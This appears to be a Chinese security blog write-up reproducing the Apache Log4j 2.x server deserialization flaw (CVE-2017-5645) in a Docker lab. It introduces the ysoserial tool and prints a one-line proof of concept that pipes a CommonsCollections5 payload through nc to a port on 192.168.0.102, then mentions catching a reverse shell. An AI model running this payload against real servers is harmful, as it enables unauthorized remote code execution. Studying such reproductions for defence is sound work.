ApacheLog4jServer反序列化命令执⾏漏洞(CVE-2017-
5645)复现
由于最近项⽬遇到这个漏洞,复现学习⼀下。
⼀、漏洞介绍
Apache Log4j是⼀个⽤于Java的⽇志记录库,其⽀持启动远程⽇志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利⽤该漏洞执⾏任意代码。
⼆、漏洞环境
执⾏如下命令启动漏洞环境
docker-compose up -d
下载环境
服务开启
三、漏洞复现
先要下载⼀个:
ysoserial-master-30099844c6-1.jar
地址:
源码下载地址 :
jar包下载地址:
ysoserial简介
ysoserial是⼀款在Github开源的知名java 反序列化利⽤⼯具,⾥⾯集合了各种java反序列化payload;由于其中部分payload使⽤到的低版本JDK中的类,所以建议⾃⼰私下分析学习时使⽤低版本JDK JDK版本建议在1.7u21以下。
poc执⾏:
java-jar ysoserial-master-30099844c6-1.jar CommonsCollections5"需要执⾏的脚本base64 encode"| nc192.168.0.1024712
执⾏poc
下载apache
接收反弹shell
四、参考:
后台回复"ysoserial"也可下载ysoserial-master-30099844c6-1.jar
免责声明:本站提供安全⼯具、程序(⽅法)可能带有攻击性,仅供安全研究与教学之⽤,风险⾃负!

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。